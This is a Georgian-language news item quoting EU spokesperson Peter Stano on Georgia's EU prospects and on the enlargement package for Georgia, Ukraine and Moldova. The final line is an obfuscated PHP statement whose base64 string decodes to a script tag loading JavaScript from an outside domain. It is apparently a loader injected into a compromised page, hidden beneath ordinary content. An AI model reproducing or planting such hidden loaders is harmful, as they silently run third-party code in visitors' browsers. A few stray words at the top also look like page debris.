celsiusi
ავერსი შნაიდერი
საქართველო მიიღებს იმას, რასაც დაჰპირდნენ და რა თქმა უნდა, ჩვენ ველოდებით იმავეს საქართველოსგან, რომ საქართველო შეასრულებს ყველა ვალდებულებას და ყველაფერს, რაც აუცილებელია ამ ძალიან მნიშვნელოვან პროცესში წინსვლისთვის, – ამის შესახებ ევროკავშირის საგარეო ურთიერთობათა და უსაფრთხოების პოლიტიკის პრესსპიკერმა, პიტერ სტანომ განაცხადა.
 
მისივე თქმით, პროცედურული მიზეზებიდან გამომდინარე, საქართველოს, უკრაინის და მოლდოვის გაფართოების პაკეტში ჩასმა მიმდინარე წელს შეუძლებელია.
 
„საქართველო მიიღებს ყველაფერს, რასაც ევროკავშირი დაჰპირდა, რადგან ბუნებრივია, ჩვენ ვასრულებთ ჩვენს დაპირებებს. ევროპულმა საბჭომ სთხოვა ევროკომისიას, რომ ჩასვას უკრაინა, მოლდოვა და საქართველო გაფართოების პაკეტში. ჩვეულებრივ, გაფართოების პაკეტი ყოველ წელს შემოდგომით ქვეყნდება, ხოლო ანგარიშის მომზადების პერიოდი იწყება გაზაფხულზე. რა თქმა უნდა, ცხადია, რომ ლოგიკური მიზეზებით, პროცედურული მიზეზებით ამ სამი ქვეყნის გაფართოების პაკეტში ჩასმა მიმდინარე წელს შეუძლებელია. ჩვენ ასევე ვთქვით, რომ მიმდინარე წლის დეკემბერში ევროკომისია წარადგენს ანალიტიკურ ანგარიშს, სადაც განხილული იქნება პრიორიტეტები, რომლებიც განისაზღვრა საქართველოსთვის. ასე რომ, როგორც ვთქვი, საქართველო მიიღებს იმას, რასაც დაჰპირდნენ და რა თქმა უნდა, ჩვენ ველოდებით იმავეს საქართველოსგან, რომ საქართველო შეასრულებს ყველა ვალდებულებას და ყველაფერს, რაც აუცილებელია ამ ძალიან მნიშვნელოვან პროცესში წინსვლისთვის“, – განაცხადა პიტერ სტანომ.
 
 
465
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");